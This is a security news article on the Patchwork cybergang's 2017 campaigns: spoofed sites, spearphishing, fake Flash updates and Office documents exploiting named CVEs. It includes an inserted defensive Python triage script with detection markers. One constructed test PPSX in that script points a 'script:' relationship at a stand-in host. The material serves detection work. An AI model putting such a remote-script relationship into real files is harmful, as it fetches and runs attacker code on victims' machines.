Trend Micro researchers trailed the activities of the Patchwork cybergang over the course of its campaigns in 2017, and though the group may not be as innovative as other cybergangs, its repertoire of infection vectors and payloads makes it a credible threat.
The group has spoofed a news site to deliver malware-ridden documents, sent spearphishing emails containing malicious links to weaponized documents, and misused email and newsletter distribution services to send spammed messages, according to a Dec. 11 report.
The group has also employed drive-by download tactics by spoofing a social video platform popular in China to trick users into downloading and executing a fake Adobe Flash Player update, which is actually a variant of the xRAT Trojan.
Researchers said the diversity of the group's attack methods is notable: they range across social engineering hooks, attack chains and backdoors, while also exploiting recently reported vulnerabilities.
Patchwork also managed to weaponize several documents, including Rich Text Format (RTF) files that trigger an exploit for CVE-2012-1856, PowerPoint Open XML Slide Show (PPSX) files exploiting Sandworm (CVE-2014-4114), PowerPoint (PPT) files exploiting CVE-2017-0199, PPSX files that exploit CVE-2017-8570, and RTF files exploiting CVE-2015-1641.
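A defender-side triage check for the document types listed above, added here as an example rather than code from the Trend Micro report: it flags RTF files carrying OLE object control words and OOXML packages (PPSX/PPTX/DOCX) that contain embedded parts, external relationships or a script: moniker target. The marker lists and the sample inputs are constructed for the example; a hit means "inspect in a sandbox", not confirmed exploitation.

```python
import io
import re
import zipfile

# Markers of embedded or linked objects in RTF and Office Open XML containers (assumed list).
RTF_OBJECT_MARKERS = (b"\\objdata", b"\\objupdate", b"\\objautlink")
OOXML_EMBED_PREFIXES = ("ppt/embeddings/", "word/embeddings/", "ppt/activeX/")
SCRIPT_MONIKER = re.compile(rb"script:", re.IGNORECASE)


def triage_rtf(data: bytes) -> dict:
    """Flag RTF blobs that carry OLE object control words."""
    findings = [m.decode() for m in RTF_OBJECT_MARKERS if m in data]
    return {"format": "rtf", "suspicious": bool(findings), "findings": findings}


def triage_ooxml(data: bytes) -> dict:
    """Flag OOXML packages with embedded OLE parts, external or script: relationship targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith(OOXML_EMBED_PREFIXES):
                findings.append(f"embedded part: {name}")
            if name.endswith(".rels"):
                rels = z.read(name)
                if SCRIPT_MONIKER.search(rels):
                    findings.append(f"script: moniker in {name}")
                if b'TargetMode="External"' in rels:
                    findings.append(f"external relationship in {name}")
    return {"format": "ooxml", "suspicious": bool(findings), "findings": findings}


def triage(data: bytes) -> dict:
    """Dispatch on the container signature (RTF header or zip local-file magic)."""
    if data.startswith(b"{\\rtf"):
        return triage_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return triage_ooxml(data)
    return {"format": "unknown", "suspicious": False, "findings": []}


# Constructed samples (not real malware): a benign RTF, an RTF with an OLE
# object, and a minimal PPSX whose slide relationship points at a script: URL.
BENIGN_RTF = b"{\\rtf1\\ansi Hello}"
OLE_RTF = b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata 0102}}}"


def constructed_ppsx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/_rels/slide1.xml.rels",
                   '<Relationships><Relationship Id="rId2" Target="script:'
                   'http://example.invalid/x" TargetMode="External"/></Relationships>')
    return buf.getvalue()
```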
The group used these methods to target multiple sectors: high-profile personalities, business-to-consumer (B2C) online retailers, telecommunications firms, media companies, aerospace researchers, and financial institutions in China and South Asia, and even in the U.K., Turkey, and Israel.
Although the group's motivations aren't entirely known, researchers said the group's activities appear to be cyberespionage-related, judging by the malware it uses, which seeks mission-critical and confidential data as opposed to information that can be monetized.
Andrew Speakmaster, chief technology officer and founding partner of SiO4, said the group is evolving to deliver specific data to cyber criminals in the underground economy.
“They are part of an evolving cyberespionage group that is marketing and monetizing the data they have available,” Speakmaster said. “We are seeing more and more types of ‘turnkey’ tools and almost ‘data on demand’ from these groups.”
Chris Morales, chief security architect at Vectra Networks, added that the group's motivations, or even who is attacking, ultimately don't matter in the long run.
He added that most organizations rely on threat feeds from government agencies like the FBI, which create noise for organizations not able to understand the specific actors who might target them.
“The motivation of the attacker is always financial or competitive gain, or theft of intellectual property,” Morales said. “The who is a constantly changing landscape and very hard to track for most every organization, which makes tracking organizations in a meaningful way almost impossible for any organization not employing a team of researchers focused on attribution.”
Morales added that it is more important to focus on those tools and techniques and to identify attacker behaviors as they occur in real time inside your own network.